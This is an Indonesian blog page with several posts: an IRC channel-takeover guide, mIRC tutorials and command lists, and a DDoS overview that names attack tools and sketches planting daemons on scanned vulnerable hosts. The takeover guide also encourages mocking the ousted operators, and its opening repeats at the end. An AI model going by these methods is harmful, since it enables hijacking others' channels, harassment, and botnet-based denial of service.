Cara menjadi OP di IRC
Tujuan dari artikel ini adalah untuk menyediakan apa yang menurut saya
adalah metodologi paling optimal dalam meng-hack channel IRC. Sebagai
Tambahan, akan disediakan pula beberapa channel yang lebih enak di-hack
dan juga aktivitas-aktivitas menarik yang dapat dilakukan jika kamu
berhasil mengambil alih kekuasaan dalam sebuah channel (0wn1ng).
1. Mengapa nge-hack IRC ???
Sudah berkali-kali saya tanyakan kepada diri saya sendiri pertanyaan ini
dan jawaban-jawabannya ada banyak dan bervariasi. Salah satu dari alasan
utama mengehack channel IRC adalah berasal dari kebosanan. Biar
bagaimanapun, banyak alasan-alasan lain yang ada.
Segala yang kamu perlukan adalah keinginan, sedikit kemampuan, dan tentu
saja 'perangkat' yang tepat.
2. Perangkat yang tepat
Segala tukang memerlukan perkakas yang bisa diandalkan dan hacker-hacker
IRC tidaklah terkecuali. Tanpa peralatan ini kamu nggak akan bisa berbu-
at apapun. Semua perangkat yang kamu perlukan bisa didownload dari site
ftp umum. Sebelum saya lanjutkan ke diskusi mengenai apa yang akan kamu
perlukan, adalah penting untuk diketahui bahwa jika kamu membaca dokumen
ini dengan menggunakan account slip/ppp, mungkin ada baiknya kamu usa-
hakan mendapat account shell jika kamu serius mengenai masalah hacking.
(Baca artikel 'UNIX Shell dalam 24 Jam' oleh LithErr di Edisi lalu).
Mungkin banyak yang tidak setuju, tapi menurut pengalaman saya, mIRC a-
taupun program-program skrip IRC lainnya untuk PC tidaklah bisa menan-
dingi kecepatan dan kemudahan dari IRC 'shell script'. Jadi jelaslah
program pertama yang kita perlukan adalah IRC shell script yang sempurna.
Jika kamu bisa koneksi ke IRC melalui account shell kamu, artinya kamu
sudah punya script yang bisa dipakai. Sedangkan untuk yang masih ingin
mencoba hal baru, IRC script favorit saya adalah LICE - bisa didapat da-
ri site ftp umum. Skrip-skrip lain tersedia secara luas, namun kedahsyatan
command-command LICE tidaklah ada duanya. Nah, walaupun sekarang sudah
mungkin kamu berhenti membaca dokumen ini dan mulai menge-hack ops dengan
menggunakan hanya satu skrip, akan masih sangat susah bagi kamu jika kamu
tidak menggunakan alat-alat bantu sampingan. Saya menyarankan dua program
berikut:
1) Multi-Collide-Bot (MCB) dan 2) Link Looker (LL)
Kedua program C diatas adalah prajurit dan spion kamu. Sekali lagi, kedua-
nya tersedia secara umum melalui ftp dan keduanya perlu dikompilasi.
3. Apa yang diperlukan untuk mengambil alih kontrol
Dalam rangka meng-takeover sebuah channel secara efektif, kamu perlu men-
jadi satu-satunya pengguna dengan tanda @ didepan nama kamu. Jika kamu
berhasil melakukan hal ini, maka channel tersebut adalah MILIK KAMU!
Tentu saja, ini adalah sampai status tersebut direbut kembali atau sampai
kamu merasa cape menge-hack channel tsb. Ada banyak cara efektif untuk
mengambil alih kekuasaan di sebuah channel, dan saya akan mulai dengan
yang lebih sederhana.
Dari segala metode, cara yang paling sederhana untuk mendapat op adalah
dengan meminta secara langsung. Anda tertawa, heh? Jelas, seiring dengan
pertumbuhan hackers di IRC, metode meminta ini semakin sukar dilakukan.
Ini terjadi khususnya pada channel-channel yang cukup besar dan cukup
mapan sehingga punya semacam 'kultur' sendiri, seperti #netsex, #teensex,
#windows95, #bawel, #BDSM, #blaklife, #texas, #hack, dan channel-channel
#warez bersaudara. Tentu saja kamu tidak membaca artikel ini hanya untuk
diajari caranya meminta ops. Selain meminta, cara yang cukup efektif ada-
lah dengan memanfaatkan 'split'.
Apa yang dimaksud dengan 'split'? Sebuah 'split' terjadi ketika IRC server
tempat kamu berada memisahkan diri dari internet. Jika kamu ada di sebuah
channel dan tiba-tiba server kamu 'split' dan kamu adalah satu-satunya dari
channel tersebut yang terpisah, kamu akan menjadi sendiri dalam sebuah
channel, dan untuk mendapatkan ops, kamu cukup /leave dan re /join. Dan kamu
bisa melihat bahwa sekarang kamu mempunyai tanda @ didepan nick kamu. Ketika
server irc yang split tadi kembali menghubungkan diri ke net, sekarang kamu
sudah menjadi op. Sekarang kamupun berkata, "Wah, itu sih gampang sekali."
Salah. Yang paling sering terjadi (terutama) di channel-channel besar, banyak
yang akan men-deop kamu, dan merebut kembali status op kamu. Juga, lebih
penting lagi, jika kamu hanya mengandalkan 'luck' dengan cara masuk ke sebuah
channel dan menunggu server kamu untuk 'split' bisa bisa kamu mati duluan
menungguin server split. Lalu apa yang bisa dilakukan oleh sang wannabe IRC
hacker? Link Looker adalah jawabannya.
4. Link Looker
Link looker adalah program kecil yang bertindak sebagai agen spy kamu.
Tanpa menjelaskan mekanisme program yang cukup kompleks, pada dasarnya apa
yang perlu kamu ketahui adalah kegunaan program ini adalah untuk mengetahui
jika ada server IRC yang 'split'. Setiap kali sebuah server memisahkan diri,
LL akan mengidentifikasi server ini dan memberitahukan kamu mengenai hal
ini. LL juga akan memberitahukan kamu ketika sang server kembali bergabung.
Apakah metode ini semakin jelas, sekarang? Ya. Betul sekali. Ketika LL mem-
beritahukan kamu bahwa sebuah server sedang 'split', kamu segera connect
ke server tersebut dan /join channel yang kamu inginkan, dan berharaplah
bahwa tidak ada orang lain yang ikut-ikutan split di channel tsb (jika hal
ini terjadi, kamu nggak akan berhasil menjadi op). Cukup penting diingat
bahwa mengambil alih channel dengan cara menunggu split dan rejoin efektif
berlaku di channel-channel berukuran kecil sampai sedang, ataupun channel
yang tidak terorganisasi atau memanfaatkan 'bots' sebagai pelindung. Apa
yang perlu kamu lakukan adalah cukup dengan menunggu server split untuk re-
join kembali dan begitu kamu menjadi op di sebuah channel, luncurkan perin-
tah 'mass deop' (termasuk dalam skrip kamu dan merupakan kunci utama untuk
mem-'bersihkan' channel dari op-op lain). Dalam channel-channel yang lebih
besar dan lebih terorganisasi, biasanya cara diatas tidak akan bisa dilaku-
kan secara mudah dikarenakan hadirnya bot-bot penjaga dan juga skrip-skrip
'IRC Warrior' yang digunakan oleh para op beneran (manusia).
5. Bots dan Scripts
Channel channel yang lebih besar dan lebih terorganisasi, biasanya dijaga o-
leh bot-bot yang biasanya berfungsi untuk menjaga agar op tetap berfungsi di
pemilik op yang sah dengan cara kehadirannya yang berkesinambungan, dan juga
mempunyai kemampuan untuk mempertahankan channel dari serangan IRC hackers.
Ada banyak tipe dan jenis bot-bot ini, dan yang paling bagus biasanya juga
mempunyai kemampuan deopping 'splitters' seperti anda. Bukan hanya itu, bia-
sanya banyak pula human ops yang mempunyai skrip (seperti LICE) yang bisa
men-deop kamu secara otomatis. Nah, dengan semakin kompleksnya dunia IRC,
sebuah fenomena baru yang sering terjadi adalah 'desynch'. Hal ini adalah ke-
jadian cukup gila yang mengambil tempat saat kamu 'rejoin' dari 'split' dan
skrip kamu mendeop op-op asli sedangkan secara bersamaan skrip milik op-op
asli men-deop kamu. Yang akan terjadi adalah server-server yang terlibat akan
menjadi bingung dan akan memberi perintah desinkronisasi satu sama lain. Hal
ini perlu dihindari. Bagaimana caranya untuk mengambil alih channel yang di-
lindungi oleh skrip-skrip dan bot-bot? Tentu saja dengan menggunakan MCB!
6. Multi-Collide-Bot (MCB)
MCB adalah alat bantu yang berharga bagi kamu. MCB adalah juga sebuah program
cantik yang menciptakan sebuah 'clone' dari nick yang ingin kamu bunuh (nick
milik op-op lain di sebuah channel) di sebuah server yang sedang mengalami
'split' (ya, server yang ditemukan oleh Link Looker). Secara garis besar, kamu
berikan sang MCB nama / nama-nama dari op-op yang ingin kamu bantai, dan beri-
tahukan program ini server split mana yang akan membuat 'clone' tsb saat
rejoin. Akibat dari Bot ini adalah, target kamu akan terlempar keluar dari
channel (melepas status op). Jika kamu berhasil membunuh semua op di channel
target kamu, maka kamu akan menjadi satu-satunya op di channel itu. Tak ada
yang lebih memuaskan daripada menyaksikan 'nick kill messages' dari op yang
kamu bunuh.
Ada beberapa hal yang kamu perlu perhatikan sebelum kamu mencoba untuk meng-
takeover sebuah channel di IRC. Yang paling jelas dan penting adalah menge-
tahui siapa-siapa yang akan kamu serang. Amati channel ybs selama beberapa
menit, catat siapa yang merupakan op asli dan siapa yang merupakan bot, dan
juga siapa diantara mereka yang melakukan 'deop splitters'. Mereka-mereka
inilah yang perlu kamu targetkan untuk dibunuh oleh MCB. Hal yang juga perlu
diperhatikan (dan kalian yang kebetulan juga merupakan ChanOp di sebuah chan
ini adalah pertahanan yang bisa kamu andalkan) adalah op-op yang secara otomatis
mengganti nick mereka saat mereka mendeteksi sebuah 'split'. Jika hal ini
terjadi maka MCB kamu tidak akan berfungsi seperti yang diinginkan.
Cara yang bisa dimanfaatkan adalah dengan memonitor dua sisi split. Jadi de-
ngan menggunakan satu MCB di server yang terpisah, dan tetap berada di channel
yang masih terhubung ke net.
7. Hal-hal asyik yang bisa dilakukan.
Sekali kamu berhasil meng-takeover sebuah channel, tentu saja banyak yang bisa
kamu lakukan. Biar bagaimanapun, biarlah saya bagi pengalaman mengenai beberapa
ide cemerlang yang dijamin akan menjengkelkan musuh-musuhmu di irc:
- Ledek (mantan) ops di channel tsb. Setelah kena 'kick' tentu mereka akan kem-
bali dan mengutuk dan menyumpah kamu. Mungkin seperti "get a life, loser" etc.
ingatlah, jangan diambil terlalu personal.Ingat juga bahwa merekalah yang perlu
'get a life' sebab merekalah biangnya, toh mereka pula yang tadinya punya op.
lanjutkanlah ledekanmu, dan jika mereka menjadi benar-benar kasar, kick saja.
Saat mereka kembali, bisa juga kamu bumbui dengan "Now, now. I am in full con-
trol of this channel and will not tolerate such language ... heheheh "
- word ban. di LICE bisa kamu pilih kata/kalimat yang akan mengakibatkan user di-
kick tiapkali dia menyebut kata yang di-ban. gunakan teknik ini di #teensex
atau #netsex, dan tiap kali ada yang menyebut "sex" atau "fuck" etc.
- satu lagi, adalah dengan memoderator channel. Yang bisa dilakukan ialah dengan
/mode +m untuk mengakibatkan tak ada seorangpun yang bisa berbicara. jadi
kamulah satu satunya yang bisa bicara di channel ini. Berguna jika kamu ingin
menyampaikan pesan/pendapat tanpa interupsi.
- dll. dll.
semoga ini menjadi bahan referensi untuk kalian yang berkecimpung di dunia
IRC. Gunakan pengetahuan disini untuk melindungi kamu sendiri... dll
Sabtu, 24 Oktober 2009
http://capunky.blogspot.com/2008/08/cara-menjadi-op-di-irc.html
Diposting oleh anak nyangkruq di 06.14 0 komentar
Menggunakan MIRC
menikmati cara berkomunikasi gratis ke seluruh dunia dengan mIRC. Bisa untuk chatting, konfrensi, diskusi dengan ribuan orang, atau mojok berdua, sharing file sampai main game bareng.
mIRC dapat dengan mudah dikonfigurasi, mempunyai banyak fitur seperti buddy lists (daftar teman), file transfers, multi server connection, suara, dsb.
Jika anda baru pemula dengan mIRC berikut panduan yang akan membantu Anda untuk: KONEK ke mIRC, BERGABUNG (join) suatu Channel dan Mulai Chatting dengan mIRC.
Ketika anda sudah kenal dan nyaman dengan ketiga hal dasar tersebut, selanjutnya terserah Anda, boleh berkreasi dan menggunakan fitur-fitur mIRC yang lebih kompleks dan canggih.
Menginstall mIRC di komputer Anda:
Jika anda di warnet, biasanya sudah ada mIRC di sana, tinggal pakai. Jika belum berikut langkah-langkah memasangnya di komputer Anda:
Pertama:
Download dulu programnya, klik url ini: http://www.mirc.com/get.html (terbuka di window baru), kemudian akan muncul halaman download, klik tombol seperti ini:
http://belajarbisnis.net/gbr/mirc-download-01.jpg
Anda akan dibawa lagi ke halaman berikutnya untuk aktual download:
http://belajarbisnis.net/gbr/mirc-download-02.jpg
Klik tombol Download Now seperti diatas
Muncul Dialog window seperti ini:
http://belajarbisnis.net/gbr/mirc-download-03.jpg
Klik pada tombol Save File
Tentukan di folder mana Anda akan menyimpan file mirc634.exe tersebut (biasanya akan berada di desktop Anda), kita akan menggunakan file ini untuk menginsall mIRC.
Download selesai.
Sekarang kita akan memasang mIRC di komputer Anda.
Double klik pada file mirc634.exe tadi, akan muncul dialog window seperti ini:
http://belajarbisnis.net/gbr/mirc-setup-01.jpg
Anda tinggal clik tombol Next
Selanjutnya sangat mudah, tidak perlu saya tampilkan gambar.
Muncul Dialog Licence Agreement Pilih Agree
Muncul Dialog Choose Install Location Klik Next Saja
Muncul Dialog Chooe Components Pilih Full, klik Next saja
Muncul Dialog Select Additional Task, Pilih Next saja
Muncul Ready to Install, Pilih Install
Muncul Dialog Completing the mIRC Setup Wizard,
Silahkan conteng Run mIRC kemudian pilih Finish
Selesai sudah setup (pemasangan) mIRC di komputer Anda.
–
Menjalankan mIRC
Yang paling penting anda bisa 3 hal dasar: Konek, Join Channel, Mulai Chatting.
Pertama, double clik program mIRC dengan gambar seperti di bawah ini untuk memulai:
http://belajarbisnis.net/gbr/mirc-shortcut.jpg
Anda berhasil jika telah muncul window utama mIRC dan dialog berikut akan muncul:
http://belajarbisnis.net/gbr/mirc-about.jpg
Pilih Continue saja
Berikutnya akan muncul Dialog mIRC OPTION
Anda dapat kembali ke bagian OPTION ini dari menu TOOLS > OPTION atau tekan ALT+O di keyboard Anda:
http://belajarbisnis.net/gbr/mirc-option-01.jpg
gambar option-01
Perhatikan: Pada Category Connect silakan isi data Anda seperti contoh data saya diatas. Jangan tekan tombol Connect dulu, karena kita akan pilih Option Kedua yaitu Server, seperti di bawah ini:
http://belajarbisnis.net/gbr/mirc-option-02.jpg
(gambar server *)
Misalnya pilih Dalnet
Kemudian clik tombo Select
Setelah clik tombol Select, Anda akan dikembalikan ke pilihan Connect seperti layar diatas (gambar option-01). Barulah anda clik tombol Connect (di bawah New Server Window)
Tunggu beberapa saat….
Akan ada tulisan:
* Connecting to irc.dal.net (6665)
-
-swiftco.wa.us.dal.net- *** Looking up your hostname…
..
..
..
Sampai kemudian muncul
Welcome to the DALnet IRC Network Mufli!~plazino@125.164.205.1..
http://belajarbisnis.net/gbr/mirc-connected.jpg
(gambar connected)
Sampai di sini berarti kita sudah terhubung ke server mIRC.
Perhatikan pojok kiri yang saya beri panah merah sangat penting!. Ini tempat kita mengetikkan perintah-perintah misalnya untuk pindah server, pindah channel, dan sebagainya. Akan saya jelaskan di bawah ini.
Terhubung belum berarti langsung bisa chatting atau ikut konfrensi. Kita perlu untuk masuk ke suatu CHANNEL. Di dalam Channel inilah kita mulai bicara :)
–
Pindah Server (memilih server lain):
Kalau kita tidak berada pada server yang sama maka kita tak bisa ketemu.
Server bisa dipilih di dalam list melalui layar seperti yang terlihat di diatas tadi lihat (gambar server *). Sebenarnya, nama server seperti DALnet tadi hanya nama untuk memudahkan waktu memilih, aktualnya nama tersebut terhubung dengan nama domain seperti ini: irc.dal.net
Jadi, bicara tentang server lebih baik kita akrab dengan nama seperti yang terakhir, misalnya irc.dal.net atau eu.undernet.org atau irc.myquran.org dan sebagainya.
Anda bisa juga masuk ke server dengan mengetikkannya di pojok kiri bawah layar Anda, perhatikan (gambar connected) di atas, kemudian ketikkan:
/server irc.dal.net
Contoh lain:
Untuk konek ke server eu.undernet.org pada panah merah tadi ketik /server eu.undernet.org
Untuk konek ke server irc.myquran.org ketikkan /server irc.myquran.org
Jika Anda berhasil masuk ke suatu server, maka akan muncul kembali layar Welcome seperti gambar diatas (gambar connected)
Saat berhasil konek, akan muncul mIRC Favourite Channel. Anda bisa menutupnya agar tidak mengganggu, anda bisa juga mematikan opsi munculnya dialog mIRC Favourite Channel ini dengan melepas centang pada pop up favourite on connect dan enable join on connect.
Note:
Tidak semua server mengijinkan Anda masuk, bisa juga suatu server down, dan sebagainya.
Selesai masalah koneksi.
–
Memilih Channel
Ada beberapa cara memilih Channel, bisa dari menu:
TOOLS > Channe List untuk melihat channel yang ada kemudian Anda bisa nimbrung.
Atau jika anda sudah tau nama channel yang akan anda ikuti, silahkan pilih menu:
COMMAND > Join Channel > kemudian ketikkan Nama Channel di kotak yang tersedia.
Atau ketikkan: /j namachannel di bagian bawah Window Status Anda, nama channel tentunya sesuai dengan nama yang sudah ada.
Seperti ini:
http://belajarbisnis.net/gbr/mirch-choose-channel-01.jpg
(gambar channel window)
Jika Anda berhasil masuk, maka akan muncul window baru dengan nama channelnya seperti diatas.
Kalau anda masuk ke suatu channel yang belum pernah dibuat, maka channel tersebut akan dibuat otomatis oleh mIRC dan anda sebagai pemiliknya, anda sendirian di sana sampai ada orang lain yang ingin bergabung. Sebaliknya jika anda masuk ke suatu channel yang sudah ada orangnya, maka anda bisa langsung Chatting.
Seperti saya di atas, membuat channel dengan nama seminarseo dan saya sendirian di sana.
–
Membuat Channel Dengan Key (Kode Rahasia)
Adakalanya Anda perlu membuat suatu channel yang mempunyai KEY, bisa kita anggap semacam kode atau password. Dengan cara ini maka yang dapat masuk ke Channel yang anda buat adalah mereka yang anda beritau Key nya saja.
Untuk membuatnya, sama saja seperti diatas (perhatikan gambar channel window di atas). Buat sebuah channel yang baru, setelah jadi dan anda masuk ke dalamnya, maka pada tengah-tengah channel tersebut KLIK KANAN, kemudian pilih Channel Mode, maka akan muncul dialog seperti ini:
http://belajarbisnis.net/gbr/mirc-channel-key.jpg
gambar channel mode
Centang pada Key dan masukkan key di kotak disebelah kanannya, kemudian klik tombol OK
Untuk masuk ke channel yang telah disetup key nya seperti ini, sama seperti cara masuk channel biasa, bedanya: Anda harus menambahkan key tersebut.
Dari menu COMMAND > Join Channel > kemudian ketikkan NamaChannel key
Contoh: seminarseo 12345
Atau dari window Anda, ketikkan /j seminarseo 12345
Selesai sampai disini.
Anda sudah masuk ke channel dan bisa mulai Chatting…
–
Menggunakan mIRC Toolbar:
Di bagian atas layar mIRC anda ada gambar-gambar seperti ini, disebut Toolbar
http://belajarbisnis.net/gbr/mirc-toolbar.jpg
(gambar toolbar)
Anda dapat meletakkan kursor mouse Anda di atas gambar-gambar tersebut (bukan klik tetapi letakkan posisi mouse saja), maka akan muncul hint (keterangan) tentang fungsi gambar-gambar tesebut. Ini memudahkan anda menggunakan fungsi-fungsi mIRC tanpa mengetik.
OPTION
gambar palu, digunakan untuk mengatur mIRC anda seperti Nickname, Server yang dipilih, channel default, dsb.
FAVOURITE
gambar hati, untuk menuju pada channel favourite Anda.
Dan seterusnya.
Apa yang dapat dikerjakan dengan Toolbar, dapat juga anda kerjakan melalui MENU (File, View, Favourite, Tools, Command, dsb) perhatikan tulisan diatas gambar toolbar. Anda dapat mengikutinya, sudah ada pilihan-pilihan yang mudah dimengerti disana. Misalnya untuk join suatu channel tinggal pilih menu COMMAND > JOIN CHANNEL.
Yang wajib dikuasai saat ini hanya 3: (Install, Konek, Join Channel)
1. Install (jika belum) agar anda punya mIRC
2. Konek ke server atau pindah server seperti saya bahas di atas, pada layar anda ketikkan perintahnya: /server namaserver misalnya /server irc.myquran.org
Ini bisa juga anda lakukan dari toolbar OPTION atau lakukan dari menu TOOLS > OPTION
3. Join Channel. Dari layar anda ketik /j namachannel misalnya : /j cafebisnis (tambah key jika channel tersebut telah diberi key), misalnya /j cafebisnis 12345.
Ini bisa juga anda lakukan dari ToolBar Favourite kemudian mengetikkan atau memilih channel, atau dari menu COMMAND > JOIN CHANNEL dan mengetikkan nama channel (tambahkan key bila diperlukan).
Sekarang anda sudah berada di dalam Channel. Boleh pindah server seperti diatas jika diperlukan atau jika anda salah masuk server. Silahkan Start Chatting.
Sekarang Anda perlu TAKE ACTION: Install mIRC, Coba konek dan masuk ke suatu channel. Silahkan baca sekali lagi dari Atas sambil LANGSUNG PRAKTEK.
Terimakasih.
Diposting oleh anak nyangkruq di 06.07 0 komentar
http://capunky.blogspot.com/2008/08/hackers-notepad-notepad-resource-hacker.html
Perintah mIRC
Bagi anda yang mau chatting di mIRC,ikuti dan kuasai semua trik2 ini.
Semua commans atau perintah ini di ketikan pada status bar server
/nick (nick anda) = mengganti nickname anda
/notice (nick) (pesan) = seperti pemberitahuan ke nick
/join (#channel) = masuk chennel
/say (pesan) = seperti chat biasa
/part (#channel) = keluar dari channel
/msg (nick) (pesan) = kirim pesan ke nick
/quit = keluar dari IRC
/notify (nick) = agar tau nick tersebut online / tidak
/quit (pesan) = quit dengan pesan kamu
/server (nama server) = ganti server
/query (nick) = private msg ke user
/invite (nick) (#channel) = invite user
/dcc chat (nick) = dcc chat ke nick
/dcc send (nick) (filename) = kirim file
/mode (nick kamu) +I = ubah mode menjadi invisible (tidak kelihatan di /who #channel oleh orang)
/ignore (nick) atau /ignore *@IPnya = abaikan user, semua tulisannya tidak akan kita lihat
/me (pesan) = action, hasilnya *(nick) (pesan)
/list = melihat list semua chennel
/who (nick/#channel) = melihat keterangan user atau chennel
/whois (nick) = melihat keterangan ttg user
/away (pesan) = pergi sesaat dengan pesan
/away = menyatakan balik dari away
/ctcp (nick) ping = periksa berapa lama ketikan kamu sampai ke user
/ctcp (nick kamu) ping = cek lag kamu sendiri
/uwho (nick) = melihat U central nick
/clear = bersihkan layar aktif
/ame (pesan) ===>>>>pesan dismua channel
Mencegah serangan ketika chat di mIRC
1. Hindari spam dengan tidak mengunakan scrip remote yg tidak anda kenali betul, contohnya ketika anda chatting ada perinah seperti ini: ”WANNA BE OPERATOR #channel ?? copy/paste this“ atau “STOP SPAM copy/paste this” jangan anda copy scrip2 seperti ini jika tidak mengerti betul scripnya, delete remote yang tidak anda kenali
2. Matikan timer anda, jika ada timer yang bekerja dengan ketik /!timers off
3. Jika anda masih memakai firewall windows
* Control panel
* Double click windows firewall
* Exceptions, lihat aplisaki yg dicentang bila anda tidak mengenalinya lepaskan centangnya
* Masuk ke tab advanced
* Pilih setting, lepaskan smua centang pada service (apa lg bila ada yg tidak dikenali)Tab ICMP, lepasan juga semua centangnya
4. Matikan Remote Access caranya:
* Klik kanan pada My Computer
* Pilih Properties
* Pilih Tab "Remote, hilangkan tanda centang pada option alow remote assistance dan allow user connect
* OK
5. Menghapus User Account yg tdk
* Control Panel
* Performance and Maintenance
* Administrative Tools
* Double Klik Computer Management
* Pilih "Local Users and Groups
* Double klik Users
* Hapuslah account2 yg tdk digunakan ( yg tidak dipakai ada tanda X )
6. Gunakan Firewall untuk mencegah serangan-serangan yg mungkin tidak anda ketahui lewat port2 tertentu, dengan Firewall, anda dapat memblokir beberapa port yg biasa dijadikan jalan masuk! Silahkan cari di google untuk donlot firewallnya (jgn lupa diUPDATE )
Diposting oleh anak nyangkruq di 06.05 0 komentar
ddos Attacker
ABSTRAK
Pesatnya penyebaran internet sekarang ini, membuat banyak pelaku bisnis menggunakan jasa internet sebagai media untuk menjalankan bisnisnya. Ada juga pelaku bisnis yang hanya menggunakan jasa internet saja sebagai tempat transaksi dalam menjalankan bisnisnya. Pelaku bisnis seperti ini mungkin saja mereka tidak memiliki kantor yang tetap sebagai pusat bisnis, dimana mereka hanya mengandalkan internet sebagai pusat bisnisnya. Bagi pengusaha yang sebagian besar memanfaatkan internet sebagai pusat bisnisnya harus berhati-hati atas adanya bahaya para cracker. Salah satu serangan yang sederhana tetapi sangat berbahaya adalah serangan DDOS. Serangan DDOS ini sangat memberikan efek negative kepada para pengusaha yang menggunakan jasa layanan internet.
Kata kunci: serangan, DDOS.
PENDAHULUAN
Internet merupakan sebuah media informasi maupun komunikasi. Banyak informasi yang bisa didapatkan diinternet. Mulai dari informasi mengenai pendidikan, iklan maupun yang lainnya. Selain itu, internet juga banyak dimanfaatkan oleh para pengusaha untuk dijadikan sebagai peluang bisnis. Meskipun tidak memiliki kantor yang tetap, bisnis masih bisa dilakukan meskipun hanya menggunakan sebuah web sederhana.
Para pelaku bisnis yang hanya mengandalkan fasilitas internet harus berhati-hati atas ancaman-ancaman yang ada diinternet. Misalnya serangan DDOS yang merugikan. Serangan ini bisa membuat server web yang digunakan sulit untuk diakses, bahkan sampai tidak bisa diakses. Hal ini bisa menimbulkan kerugian di pihak pengusaha yang hanya menggunakan layanan internet untuk menjalankan bisnisnya.
PENGERTIAN DENIAL DISTRIBUTE OF SERVICE (DDOS)
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut [01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses [02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04].
Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut.
CARA KERJA SERANGAN DDOS
Cara kerja DDOS dalam melakukan serangan kepada situs yang diinginkan. Secara sederhana serangan DDOS bisa dilakukan dengan menggunakan perintah “ping” yang dimiliki oleh windows. Proses “ping” ini ditujukan kepada situs yang akan menjadi korban. Jika perintah ini hanya dilakukan oleh sebuah komputer, perintah ini mungkin tidak menimbulkan efek bagi komputer korban. Akan tetapi, jika perintah ini dilakukan oleh banyak komputer kepada satu situs maka perintah ini bisa memperlambat kerja komputer korban.
Satu komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi. Dan server dari situs yang dituju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang. Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan “Ping” ke situs yang di tuju [05].
BEBERAPA SOFTWARE YANG DIGUNAKAN UNTUK MELANCARKAN SERANGAN DDOS
Disini akan di bahas empat macam software yang bisa digunakan untuk melancarkan serangan DDOS [06].
1. The Tribal Flood Network (TFN).
TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground
yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood
connection dengan menggunakan protocol yang ada pada TCP/IP yaitu:
o UDP, difokuskan pada domain name system dan network management program.
o TCP, pusat e-mail dan web transaksi.
o ICMP, digunakan oleh para professional untuk troubleshooting network.
o Nama program masternya adalah : tribe.c dan program daemon bernama td.c
2. Trin00
Software ini menggunakan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah:
o Attack to Master : TCP Port 27665
o Master to Daemon : UDP Port 27444
o Daemon to Master(s) : UDP Port 31335
Program master : master.c dan program Daemon : ns.c
Program ini tidak bagus untuk digunakan karena master dan daemon
berhubungan dengan clear text.
3. Stacheldraht
Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup berbahaya.
o Port TCP : 16660 dan 60001
o Master program bernama : mserv.c dan daemon program bernama : td.c
o Program ini memiliki client yang juga sebagai telnet : client.c
Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.
4. TFN2K
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.
CARA MENGINSTALASI PROGRAM DDOS
Untuk menginstalasi program DDOS, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security dengan cara yang sangat mudah, gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Software client tersebut dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan[06].
EFEK DARI SERANGAN DDOS
Efek dari serangan DDOS sangat menganggu pengguna internet yang ingin mengunjungi situs yang telah diserang menggunakan DDOS. Situs yang terserang DDOS sulik untuk diakses bahkan mungkin tidak bisa untuk diakses. Kesulitan pengaksesan sebuah situs diinternet bisa saja merugikan bagi sebagian orang yang bisnisnya sangat tergantung kepada layanan internet.
Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti ini hanya merupakan gangguan yang memerlukan restart system.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker
untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini
merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai
tujuannya yang telah ditargetkan[06].
Dari pernyataan di atas dapat disimpulkan bahwa serangan DDOS tidak semata-mata hanya untuk membuat web server kelebihan beban akan tetapi merupakan sebuah taktik untuk mencapai tujuan tertentu. Tujuan itu bisa saja persaingan bisnis supaya layanan dari situs saingan terhambat.
Diposting oleh anak nyangkruq di 06.05 0 komentar
Cara menjadi OP di IRC
Tujuan dari artikel ini adalah untuk menyediakan apa yang menurut saya
adalah metodologi paling optimal dalam meng-hack channel IRC. Sebagai
Tambahan, akan disediakan pula beberapa channel yang lebih enak di-hack
dan juga aktivitas-aktivitas menarik yang dapat dilakukan jika kamu
berhasil mengambil alih kekuasaan dalam sebuah channel (0wn1ng).
1. Mengapa nge-hack IRC ???
Sudah berkali-kali saya tanyakan kepada diri saya sendiri pertanyaan ini
dan jawaban-jawabannya ada banyak dan bervariasi. Salah satu dari alasan
